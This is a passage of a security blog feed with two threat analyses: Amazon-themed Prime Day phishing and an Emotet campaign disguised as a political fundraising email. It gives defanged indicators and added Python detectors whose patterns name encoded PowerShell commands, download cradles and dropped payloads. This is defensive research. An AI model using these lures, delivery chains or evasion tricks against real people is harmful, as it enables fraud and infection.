            <description><![CDATA[ Cyber criminals target Amazon Prime members. 2020 Prime Day phishing attacks attempt to steal credit card details, PII data. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Mark your calendars, October 13-14 is Amazon’s Prime Day! Two days of exclusive deals just for Prime members. For those of us who haven’t been impulsively buying during the quarantine after spending all day sitting at our laptops, this means it might be time to open up Amazon and check out the latest deals.</p><p><b>However, cyber criminals have also prepared for what may be the biggest Prime Day ever. Each year, they</b> ramp up their Amazon phishing schemes to steal login credentials and credit card details with convincing lures about Prime membership.</p><p>Amazon is a heavily spoofed brand. Criminals commonly impersonate Amazon to steal sensitive information and bolster their ill-gotten coffers. Targets are easily tricked by these phishing messages as attackers continually update them with more timely and convincing lures. Coronavirus-related lockdowns, combined with Prime Day sales, give cyber criminals the ideal scenario for criminal activity. Instead of perusing shopping aisles with limited capacity and reduced hours, customers <a href="https://www.wsj.com/articles/amazons-sales-jump-as-coronavirus-prompts-surge-in-online-shopping-11588278740">rely more than ever</a> on Amazon for daily necessities and now, of course, the highly anticipated Prime Day deals.</p><p>What else makes Prime Day risky in 2020? Many big box retailers are cancelling their Black Friday sales in light of the pandemic, which makes Prime Day an even bigger focus for cyber criminals.</p><p>This year, attackers are using several advanced tactics to create more convincing messages.</p>
    <div>
      <h3>Your Amazon Account’s On Hold - Update Payment Info</h3>
    </div>
    <p>Amazon shoppers should understand the latest methods employed by cyber criminals, in order to avoid falling victim to these types of scams.</p><p>Here is the most prevalent phishing lure uncovered by Area 1 Security researchers: An Amazon-branded email states that there is a problem with the credit card linked to the user’s Amazon account, and the customer’s account is “on hold” until the customer can provide updated card information.</p><p>This scam, of course, is just an attempt to steal an Amazon Prime member’s credit card data.</p><p>We’ve found a number of disparate campaigns leveraging similar lures but with varying levels of sophistication.</p><p>The more stealthy phishing messages reveal convincing brand-specific content, carefully constructed to imitate a real Amazon email.</p><p>As shown in Figure 1, the content, logo and graphics are in line with what you might encounter in an actual Amazon notification email. The attacker behind this campaign used several advanced tactics to create a convincing message, including:</p><ul><li><p>Meticulous HTML/CSS coding</p></li><li><p>Embedding images from Amazon in the source code</p></li><li><p>Hosting malicious content on a legitimate website</p></li><li><p>Leveraging Newly Registered Domains (NRDs) to send the phishing messages</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3sjy28uZRUFekenfGijzfP/683be120f4c4250d675090bdbaa867eb/image9-1.png" />
            
            </figure><p>This particular campaign used numerous domains to send their phishing messages, all of which were newly registered. The sender email accounts containing these domains followed either one of two patterns:</p><ul><li><p>no-reply-amazon-notify&lt;<i>11 alphanumeric characters</i>&gt;@&lt;<i>newly registered domain</i>&gt;</p></li><li><p>mail-services-amazon-prime-&lt;<i>11 alphanumeric characters</i>&gt;@&lt;<i>newly registered domain</i>&gt;</p></li></ul><p>The phishing messages sent from these accounts contained malicious links that revealed the attacker either leveraged NRDs, or abused the legitimate services of <a href="https://snip.ly/whatis#:~:text=Sniply%20is%20a%20simple%20tool,with%20every%20link%20you%20share.">Sniply</a> to host their Amazon look-alike sites.</p><p>What is Sniply? It allows users to create custom links with a free user account. As a result, Sniply is an attractive option for attackers looking to find unsuspecting sites to host their nefarious content.</p><p>The text “Update Payment Information” in the body of the message is a hyperlink to a presumably spoofed Amazon login page. Area 1 Security observed yet another pattern, this time with the Sniply links:</p><ul><li><p>hxxps://snip[.]ly/xjey66?.amazon-prime-services=</p></li><li><p>hxxps://snip[.]ly/o1u9cb?amazon.data.prime=</p></li><li><p>hxxps://snip[.]ly/9axm0u?ad-amazon.isuue-id=</p></li></ul><p>The identification of these patterns in both the sender addresses and malicious links is highly suggestive of a phishing kit.</p><p>At the time of our analysis, the pages for these links were no longer accessible. Fortunately, Sniply was quick to the draw and blocked access to the attacker’s malicious content. 
However, with attackers easily creating Newly Registered Domains, it won’t take long to create a new malicious website and begin another wave of phishing messages.</p><p>These ever-evolving Amazon-themed campaigns are an ongoing threat to many individuals and businesses alike. The use of NRDs, as well as abuse of legitimate services, make these phish particularly difficult to detect.</p><p>To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this.</p><p>Although we recognized and stopped this campaign from reaching users’ inboxes before any damage could be done, there are still similar and ongoing campaigns with active links that are hitting the inboxes of targets without adequate email security.</p><p>As malicious actors create new campaigns with increasingly sophisticated tactics, users need to be aware of the latest techniques to stay safe from these opportunistic attacks.</p>
    <div>
      <h3>Your Amazon Prime Membership Has Expired</h3>
    </div>
    <p>Another Amazon-themed phishing campaign, launched in the days leading up to Prime Day, attempts to convince shoppers that their Prime membership has expired.</p><p>This campaign entices the customer to click a link to update card information on file in order to continue enjoying their Prime benefits. In the figure below, you can see that the message is simple, to the point, and — again — contains Amazon branding.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Phnok9aqhiGebxUEhYcQL/d9ef6267f84a8a2cfb9a7cdfc91a6bd9/image10.png" />
            
            </figure><p>In the example above, the fraudsters used Display Name Spoofing to make the email appear as if it originated from “Amazon Prime”.</p><p>However, Area 1 Security’s closer inspection of the email headers reveals that the message has an “envelope-from” address of ad4@dianefloresbrown[.]com and was sent by way of wineu[.]mail.</p><p>At the time of analysis, these domains did not resolve to any IP addresses. Further, all IPs appearing in the header were private (or for internal network use only), having no significance outside the local network, and thus providing some degree of anonymity for the attacker.</p>
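<p>The header artefacts called out in both campaigns above lend themselves to automated triage: the kit-style sender local-parts from the first campaign, and the display-name spoof, the mismatched envelope sender, and the private-only Received chain from the second. The Python below is an added example and not code from the original Area 1 Security post. It parses a raw message and reports those four conditions. The two messages are constructed for the example (the first uses the sender and envelope domain quoted above), the regexes encode the two sender patterns quoted in the first campaign, and BRAND_DOMAINS is an assumption you would maintain for the brands you care about.</p>

```python
"""Header checks for the brand-impersonation patterns in the two campaigns.

Added example, not code from the original Area 1 Security post. Reports:
1. a brand word in the From display name whose address domain is not that
   brand's (display name spoofing);
2. an envelope sender (Return-Path) domain that differs from the From domain;
3. sender local-parts matching the two kit patterns quoted in the post;
4. a Received chain whose bracketed IPs are all private addresses.
BRAND_DOMAINS and the two sample messages are constructed for the example.
"""
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Assumption: brands to protect and the domains legitimately allowed to use them.
BRAND_DOMAINS = {"amazon": {"amazon.com", "amazon.co.uk", "amazon.de"}}

# Sender local-part shapes quoted in the post (prefix + 11 alphanumerics).
KIT_LOCALPARTS = [
    re.compile(r"^no-reply-amazon-notify[a-z0-9]{11}$", re.I),
    re.compile(r"^mail-services-amazon-prime-[a-z0-9]{11}$", re.I),
]
_RECEIVED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyse_headers(raw: str) -> list:
    """Return a list of finding strings for one RFC 5322 message."""
    msg = message_from_string(raw)
    findings = []
    display, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)

    # 1. Display name spoofing: brand word present, address domain not the brand's.
    for brand, domains in BRAND_DOMAINS.items():
        if brand in display.lower() and not any(
            from_domain == d or from_domain.endswith("." + d) for d in domains
        ):
            findings.append(f"display-name-spoof: '{display}' from {from_domain or '?'}")

    # 2. Envelope sender vs. header From.
    _, envelope = parseaddr(msg.get("Return-Path", ""))
    if envelope and _domain(envelope) != from_domain:
        findings.append(
            f"envelope-mismatch: Return-Path {_domain(envelope)} vs From {from_domain}"
        )

    # 3. Kit-style sender local-parts.
    local = from_addr.split("@", 1)[0]
    if any(p.match(local) for p in KIT_LOCALPARTS):
        findings.append(f"kit-localpart: {local}")

    # 4. Received chain that exposes only private addresses.
    ips = []
    for rcv in msg.get_all("Received", []):
        ips.extend(_RECEIVED_IP.findall(rcv))
    if ips and all(ipaddress.ip_address(ip).is_private for ip in ips):
        findings.append(f"received-private-only: {', '.join(ips)}")
    return findings


# Constructed message modelled on the second campaign (sender and envelope
# domain are the ones quoted in the post; the IPs and hop names are invented).
SAMPLE_MESSAGE = """\
Return-Path: <ad4@dianefloresbrown.com>
Received: from wineu.mail ([192.168.1.10]) by mx.example.net; Tue, 13 Oct 2020 09:00:00 +0000
Received: from [10.0.0.7] by wineu.mail; Tue, 13 Oct 2020 08:59:58 +0000
From: "Amazon Prime" <ad4@dianefloresbrown.com>
To: victim@example.net
Subject: Your Amazon Prime Membership Has Expired
Content-Type: text/plain

Update your payment method to keep your benefits.
"""

# Constructed message modelled on the first campaign's sender pattern.
SAMPLE_MESSAGE_2 = """\
Return-Path: <bounce@other-nrd.example>
Received: from mail.nrd.example by mx.example.net; Tue, 13 Oct 2020 09:05:00 +0000
From: "Amazon" <no-reply-amazon-notifyab12cd34ef5@nrd.example>
To: victim@example.net
Subject: Your Amazon Account's On Hold - Update Payment Info
Content-Type: text/plain

Update Payment Information.
"""

if __name__ == "__main__":
    for sample in (SAMPLE_MESSAGE, SAMPLE_MESSAGE_2):
        for finding in analyse_headers(sample):
            print(finding)
        print("--")
```

<p>None of these checks is conclusive on its own (legitimate bulk senders routinely have a Return-Path on a different domain), which is why the function returns every finding rather than a single verdict; weighting a brand-name display name on a non-brand domain highest is the choice that would have caught both campaigns here.</p>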
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5IPKxqsP8G4ifFkzyqqOHh/fabdbdd7a82684c677e6a16d3cd12d8a/image2-6.png" />
            
            </figure><p>This particular campaign has been linked to malicious Amazon-related spoofs dating back to 2016, and is still being updated on an almost daily basis.</p><p>A number of the phishing websites used by this cyber criminal happen to share a unique URL pattern, allowing for easier tracking of the fraudulent activity.</p><p>For example, clicking on the hyperlink for the text “Update your payment method” will result in the victim’s browser loading the malicious content located at, hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F92a1dd58f9544ab8efd1c744612385a9/?dispatch=KNE0iodoOoqK5tDxLF7q0bbIsyFnO28x2xuq3Qvu5sVyxSL3EE. In an effort to avoid detection and being indexed by various web crawlers, every time the link is clicked, a new URL is generated. Parameters within the URL that vary are detailed below:</p><ul><li><p>hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F&lt;<i>hashed and base64-encoded GMT/UTC timestamp</i>&gt;/?dispatch=&lt;<i>randomly generated alphanumeric characters</i>&gt;</p></li></ul><p>After clicking the malicious link, the victim is directed through a series of steps to verify their identity and input payment information. Before being redirected to the real Amazon site, the victim is presented with a screen that displays their account has been successfully updated, and they will be logged out.</p><p>The figure below exposes the victim’s journey across multiple Amazon-branded sites:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xzK7lC0rpLGZG4tqVhQyl/695671708d4321712fad77f90c4907ad/Screenshot-2022-11-02-at-11.32.51.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/51HolmsXKZeQwsybQSBHMb/6de13a485cf1e5a3f93ea5b6789ad03a/Screenshot-2022-11-02-at-11.33.15.png" />
            
</figure><p>Figure 4. Sequence of Phishing Attack</p><p>As evidenced above, the attacker is attempting to steal not only credit card data but also personally identifiable information (PII).</p><p>This sensitive data is then sent to the attacker at the addresses btsmpil@gmail[.]com and kabiyesi@zoho[.]com. There are no cookies stored once the target is redirected to the Amazon homepage, indicating that the attack does not attempt to get additional information from the Amazon session.</p><p>In a misstep by the attacker, the index of their malicious website was made public (as shown in Figure 5), allowing anyone to view the technical details behind their operation.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/21BjrDPgCpOPlvHnMVTIta/240abf4290dbd3e4f3e37209fe26e862/image3-4.png" />
            
            </figure><p>Figure 5. Index of Malicious Website</p><p>This oversight allowed researchers at Area 1 Security to access the source code for the website and delve into the numerous scripts used to carry out the attack.</p><p>Several unique artifacts were discovered that can be used to possibly identify any additional or future campaigns carried out by this attacker. For instance, a number of div classes follow a very similar format:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Ax2v1h6HqElAXR5Lt7ZqS/e066b9265a9027c2854cef7b4f4c384a/image4-5.png" />
            
</figure><p>Figure 6. HTML of Malicious Website</p><p>As revealed in the figure above, each of the div classes uses “tajouri” as a prefix for containers, as well as the name “containtindex”. No information was found as to why this naming convention was used; however, it might give researchers another possible avenue for associating this cyber criminal with future attacks or phishing kits.</p><p>The main index page for the malicious site contains the code responsible for safeguarding its contents from web crawlers and for generating unique URLs for each visitor. As highlighted below, a screen name, “AYB SCH”, was identified on this page among a trove of profanity-laced code. Whether this attacker wanted the code to be discovered in order to gain internet notoriety is up for debate.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GlFwufBS7yFudbVVle7Pq/8bb074bca012391a46faa0d32f7d543b/carbon.png" />
            
</figure><p>An additional artifact was found that offers yet another interesting, if not unique, identifier used by this cyber criminal. The code below comes from the “Account Verification” step of the attack. The specific div class format can be seen once again, as well as what appears to be French text in the HTML’s tags, which is slang for “shut up”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Uw2IhZyIrkapu2GsXyXXw/e8747e7689c2a8d146a0f34bb3ffd5f2/carbon--1-.png" />
            
            </figure><p>This source code provides a little insight into the cyber criminals behind these Amazon-themed attacks.</p><p>Many of the phishing campaigns appear to originate from overseas, as seen in the ISPs used, and were orchestrated by individuals who are well-versed in programming, if not English expletives. These fraudsters clearly see this as a game, where they hope to outsmart defenses while taunting those that may be hot on their trail.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
<p>With cyber criminals well-equipped for the upcoming rush to Prime Day deals, it is vital that companies prepare adequate defenses to protect users from falling victim to these Amazon-themed attacks.</p><p>As malicious actors invent new ways to bypass defenses, including the use of newly registered domains and legitimate online services, security practitioners need to turn to solutions on the cutting edge of <a href="https://www.cloudflare.com/zero-trust/products/email-security/">email security technology</a> in order to block these highly-damaging, financially-driven phishing campaigns.</p><p>New tactics and methods may be able to trick legacy vendors and cloud email providers, but Area 1 Security’s anti-phishing solution stops these fraudsters dead in their tracks.</p><p>Our advanced Machine Learning and Artificial Intelligence technology allows our algorithms to uncover new tactics malicious actors are using to bypass defenses in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">stop phishing attempts</a> at delivery time. This has many advantages over post-delivery retraction in that users are never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
<p><b>Sender Domains:</b></p><p>Kimakxbisakok[.]com</p><p>kauadalahmantanterinda[.]com</p><p>Ikannilakayarasa[.]com</p><p>Bilangbabiamadia[.]com</p><p>com-accountingproved.com</p><p>ad4@dianefloresbrown[.]com</p><p>wineu[.]mail</p><p><b>Sender IP Addresses:</b></p><p>36[.]71[.]143[.]138</p><p>36[.]68[.]138[.]85</p><p><b>Sender Email Addresses:</b></p><p>no-reply-amazon-notify5jsciki79he@kimakxbisakok[.]com</p><p>no-reply-amazon-notify1os6uge0kzh@kimakxbisakok[.]com</p><p>no-reply-amazon-notifyhrbdqdoupsz@kauadalahmantanterinda[.]com</p><p>no-reply-amazon-notifym55jh93ft92@kauadalahmantanterinda[.]com</p><p>no-reply-amazon-notifykf9ul2d33jx@ikannilakayarasa[.]com</p><p>no-reply-amazon-notifymn5dzrjbwwc@bilangbabiamadia[.]com</p><p>mail-services-amazon-prime-pswrpeavczy@com-accountingproved[.]com</p><p>mail-services-amazon-prime-2av302jgvrp@com-accountingproved[.]com</p><p>mail-services-amazon-prime-5yww41luv8a@com-accountingproved[.]com</p><p>mail-services-amazon-prime-i7a98af4a29@com-accountingproved[.]com</p><p>mail-services-amazon-prime-xroq3gqfnm3@com-accountingproved[.]com</p><p><b>Attacker Email Addresses:</b></p><p>btsmpil@gmail[.]com</p><p>kabiyesi@zoho[.]com</p><p><b>Malicious Links:</b></p><p>hxxps://snip[.]ly/xjey66?.amazon-prime-services=</p><p>hxxps://snip[.]ly/o1u9cb?amazon.data.prime=</p><p>hxxps://snip[.]ly/9axm0u?ad-amazon.isuue-id=</p><p>hxxps://interistingkostins[.]com/MwM7tEj</p><p>hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F&lt;<i>hashed and base64 encoded GMT/UTC timestamp</i>&gt;/?dispatch=&lt;<i>randomly generated alphanumeric characters</i>&gt;</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">7vDwIcMpft2wnTlIQ8J2H6</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[PAC spoof drops Emotet: phishing campaign leverages stolen PAC content to drop Emotet]]></title>
            <link>https://blog.cloudflare.com/pac-spoof-drops-emotet-phish/</link>
            <pubDate>Tue, 06 Oct 2020 10:48:00 GMT</pubDate>
            <description><![CDATA[ President Donald Trump, election fundraising, Microsoft Office 365 used to send Emotet malware in fake Political Action Committee phishing email. ]]></description>
<content:encoded><![CDATA[ <p><i>This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Following the recent <a href="https://healthitsecurity.com/news/emotet-malware-actors-return-with-malicious-email-campaign">return of Emotet</a> after a five-month hiatus, a newly-discovered phishing campaign is using updated tactics by leveraging the hype surrounding President Trump’s decision to halt U.S. funding for the World Health Organization (WHO). In a ruse to drop this dangerous banking trojan, the malicious messages take the form of a typical Political Action Committee (PAC) email, eliciting support for presidential incumbent Donald Trump in the upcoming 2020 election.</p><p>First caught by Area 1 Security on August 21st, this ongoing campaign contains all the hallmarks of the resurgence of Emotet:</p><ul><li><p>Leveraging stolen email content</p></li><li><p>Subject lines prefaced with “Fwd:” and “RE:”</p></li><li><p>PowerShell commands to download and execute the malware</p></li></ul><p>This campaign, however, aims to compromise politically-related entities rather than just the typical targets of opportunity that are commonly associated with this banking trojan. In Figure 1, you can see how the attacker forwards a legitimate PAC mailer to develop a false sense of legitimacy, with entirely authentic content throughout the body of the message. Every link works and leads to benign web pages of the impersonated PAC.</p><p>Like a wolf in sheep’s clothing, the attacker cleverly disguises their Emotet delivery mechanism as messaging about timely and highly publicized, hot-button issues in politics.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ytkluOmXOD1hJxnypVEaC/76b71fe462ae6f17fbfce5323a29dae2/image4-6.png" />
            
</figure><p>Figure 1. Screenshot of phishing message</p><p>The subject of the email reads <b>“Fwd:Breaking: President. Trump suspends funding to WHO,”</b> and the attacker employs Display Name Spoofing in an attempt to mask the true sender address. The <i>actual</i> sender addresses used to spread the phishing messages vary, but all have one thing in common: <b>each is a legitimate account compromised by the attacker to launch this fraudulent WHO-themed campaign.</b></p><p>A closer look at the attacker’s infrastructure reveals compromised hosts used in the transfer of the phishing messages, such as the sending Mail Transfer Agent (MTA) server[.]websoftperu[.]com. Area 1 Security suspects that this MTA may have been compromised due to an open port running a very outdated version of OpenSSH (7.4), which has numerous <a href="https://nvd.nist.gov/vuln/search/results?form_type=Advanced&amp;cves=on&amp;cpe_version=cpe:/a:openbsd:openssh:7.4">vulnerabilities</a>.</p><p>Similarly:</p><ul><li><p>Compromised email accounts of several small businesses around the world were used in each wave of this campaign, again luring victims with the same stolen PAC email content.</p></li><li><p>One of these accounts is also connected to similar phishing messages with slightly different lures, all with the intent to infect targets with Emotet.</p></li><li><p>The example account above is, in particular, the source of various politically-themed phishing messages that contain stolen content from a number of different PAC mailers and was observed in the targeting of politically-affiliated email accounts.</p></li></ul><p>The attacker primarily uses compromised accounts to successfully pass email authentication protocols, such as DMARC, DKIM, and SPF.</p><p>Whereas other malicious actors may look for sender domains that do not have these protocols configured, or configured correctly, <b>this attacker boldly leverages correctly-configured authentication protocols to their advantage.</b> This tactic allows the attacker to bypass legacy vendors that solely rely on these authentication methods to provide indicators of maliciousness.</p><p>There is approximately one week of turnover time between each wave of the campaign as the attacker retools to get ahead of defenses. This includes various changes, such as modifying the weaponized attachment and using new compromised sender infrastructure and accounts.</p><p>Efforts like this can easily equip the attacker with the ability to circumvent typical signature-based detections that depend on IP addresses and payload hashes of known threats, leading defenders through a never-ending game of “cat and mouse”.</p>
    <div>
      <h3>Analysis of Malware</h3>
      <a href="#analysis-of-malware">
        
      </a>
    </div>
    <p>At the bottom of the phishing message, there is a Microsoft Word Document that uses VBA Macros to drop the first-stage payload, the Emotet downloader. After clicking on the document, the user is prompted by a dialog box to enable editing and content, as depicted below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2G3ir7Qw3akI7P1XaEpSak/9d311857679dfa72e2ab3aadaefc517a/image2-8.png" />
            
            </figure><p>Figure 2. Screenshot of Dialog Box</p><p>Merely clicking this box will enable a highly obfuscated VBA Macro (as shown in Figure 3) that runs an equally obfuscated PowerShell command using Windows Management Instrumentation (WMI).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5wLVTbEWxGWjgj7BoJaify/622248d7b9aedde014f413897272913b/image1-7.png" />
            
            </figure><p>Figure 3. Screenshot of Macro VBA obfuscated code</p><p>The content in Figure 4 shows a sampling of the PowerShell script after Area 1 Security researchers deobfuscated a majority of the code. This script attempts to download Emotet from a list of hardcoded <i>compromised WordPress</i> sites. It first runs through this list of sites (as highlighted below) to determine which are still actively hosting the Emotet trojan.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hEqjf9OW4FW593ADrmF9J/b20e4cb7dd78c55bc4701be7d6c3c072/image3-5.png" />
            
</figure><p>Figure 4. Screenshot of deobfuscated PowerShell</p><p>Area 1 Security found that, among the compromised sites hardcoded in the malware, only the link hxxp://cammis[.]com[.]br/wp-admin/8IArx/ was still active at the time of analysis. Once the final payload is found on a functioning site, it is downloaded to a temporary folder on the victim’s device, located at %userprofile%\AppData\Local\. From here, a message is sent back to the Emotet command and control (C2) server, confirming that it was successfully downloaded.</p>
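<p>The chain just described (a macro-enabled document, a PowerShell command launched through WMI, a payload dropped under AppData\Local) leaves a recognisable trail in process-creation telemetry. The following Python is an added example, not code from the post or from Area 1 Security; it runs a few host-based rules over constructed Sysmon-style events. It assumes that a process created through WMI appears with WmiPrvSE.exe as its parent and that the dropped executable name is seven or eight alphanumeric characters, as the indicators below suggest; the encoded-command value in the sample is a placeholder, not a real payload.</p>

```python
import re

# Constructed process-creation events using Sysmon-style field names. They model
# the chain described above (Word macro -> WMI -> PowerShell) and are not real
# telemetry from the post. Assumption: a process created via WMI's Win32_Process
# shows WmiPrvSE.exe as its parent in the log.
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "WmiPrvSE.exe -secured -Embedding"},                      # benign
    {"id": 2, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc AAAAAAAAAAAAAAAAAAAA"},       # placeholder payload
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},                    # benign admin use
    {"id": 4, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c start %USERPROFILE%\AppData\Local\Qncqa3a.exe"},  # dropped 7-char exe
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits worth flagging on their own; each is (pattern, label).
SUSPICIOUS_ARGS = [
    (re.compile(r"(?i)\s-(enc|encodedcommand|ec)\b"), "encoded command"),
    (re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b"), "hidden window"),
    (re.compile(r"(?i)download(file|string)|invoke-webrequest|\biwr\b"), "download cradle"),
    # Assumption from the IoC list: 7-8 alphanumeric chars, dropped under AppData\Local.
    (re.compile(r"(?i)appdata\\local\\[a-z0-9]{7,8}\.exe"), "short random exe in AppData\\Local"),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def assess_event(ev):
    """Return the list of detection reasons for one process-creation event."""
    parent, child = basename(ev["parent"]), basename(ev["image"])
    reasons = []
    if parent in OFFICE and child in SCRIPT_HOSTS:
        reasons.append("Office app spawned " + child)
    if parent == "wmiprvse.exe" and child in SCRIPT_HOSTS:
        reasons.append(child + " launched via WMI")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(ev["cmdline"]):
            reasons.append(label)
    return reasons


def detect(events):
    """Map event id -> reasons for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        reasons = assess_event(ev)
        if reasons:
            hits[ev["id"]] = reasons
    return hits


if __name__ == "__main__":
    for event_id, reasons in detect(EVENTS).items():
        print(event_id, reasons)
```

<p>The parent/child rules catch the launch regardless of how the macro or the PowerShell text is obfuscated, which is the point of the post's remark that the attacker retools the attachment each wave: the process ancestry does not change when the file hash does.</p>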
    <div>
      <h3>What Makes Emotet Difficult to Detect?</h3>
      <a href="#what-makes-emotet-difficult-to-detect">
        
      </a>
    </div>
<p><a href="https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/">Emotet</a> is among the most destructive and costly malware, affecting both the public and private sectors. Once this advanced, modular banking trojan compromises a target device, other hosts on the network are at risk of infection, as the malware’s worm-like capabilities allow it to easily self-replicate to other connected devices. Sensitive information on the compromised hosts is fair game: essentially no data is safe from the attacker.</p><p>Since Emotet is primarily delivered via attachments or links in phishing emails, the attacker takes extra measures to ensure their messages <b>will not trigger legacy email security solutions</b>. These tactics range from simply changing the name and hash of the malicious file, to more advanced anti-debugging and host-environment analysis capabilities.</p><p>Emotet’s modular Dynamic Link Libraries (DLLs) and polymorphic nature offer the attacker not only continuously evolving capabilities but also effortless evasion of signature-based detection systems. Analysis of this evasive trojan can present challenges for those attempting to reverse the malware, as it is virtual-environment aware and will sleep indefinitely in an attempt to render debugging techniques ineffective. With malicious actors using constantly evolving malware, new and advanced techniques are needed to detect and catch these phishing messages before they reach users’ inboxes.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
<p>Area 1 Security’s advanced Machine Learning and Artificial Intelligence technology leverages algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
<p><b>Compromised Sender Email Addresses:</b></p><p>accounts@alhilaldecors[.]com</p><p>reservas@carentminibus[.]com</p><p>sargodha@deluxefootwear[.]com[.]pk</p><p>c25@hahncollections[.]co[.]za</p><p><b>Sender IP Addresses:</b></p><p>59[.]127[.]189[.]26</p><p>103[.]133[.]214[.]57</p><p>175[.]138[.]0[.]109</p><p>208[.]109[.]80[.]1</p><p><b>Sender Domains:</b></p><p>Server1[.]gigafield[.]com</p><p>Server[.]websoftperu[.]com</p><p><b>Compromised Emotet Websites:</b></p><p>hxxp://cammis[.]com[.]br/wp-admin/8lArx/</p><p>hxxps://indiafricatoday[.]com/wp-admin/l0WmSB/</p><p>hxxp://gosmartmoving[.]com/wp-content/3QC/</p><p>hxxp://ilfacomercial[.]cl/wp-includes/P/</p><p>hxxp://hanh[.]cz/blogs/XU/</p><p>hxxps://myvanillastuffs[.]xyz/wp-admin/hjL8d/</p><p>hxxp://condi-shop[.]ru/wp-includes/nWJ/</p><p><b>Attachment Hashes:</b></p><p>MD5: 031be6a39da92ccedefc3ef3e5cc12aa</p><p>SHA1: 1eed6a05b977b6b13a8df2cafed8f1cdf7d53088</p><p>SHA256: 5d4bee6f5bb0d02b980f21c2ae731bd12d5de2e2810058e6098fc888a7cc6f7b</p><p>SSdeep: 1536:A2Fj72Fjmrdi1Ir77zOH98Wj2gpngh+a9BlJizP:1rfrzOH98ipgnYzP</p><p>MD5: 729d528ab5073b012c6dcded3872bb62</p><p>SHA1: 1984ee2ffcfc14beec272f671833bf506ab85f72</p><p>SHA256: d647fbb82b18f11ade1b505a7f9a065441fe8a187377299900bae27fe4047740</p><p>SSdeep: 3072:5Yy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////n:T0uXnWFchmmcI/o1/q1Bw4</p><p>MD5: 86b7f3f18a2e57ae66ba824b0c43be01</p><p>SHA1: ea1302e16d433653adf3071325bc8c2288b2a85e</p><p>SHA256: 874b498a569260ed044256f13bd87d1a3697f02a17a364d2d61ba9005e12cd25</p><p>SSdeep: 3072:fYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////k:B0uXnWFchmmcI/o1/N2ODQwKdk</p><p>MD5: 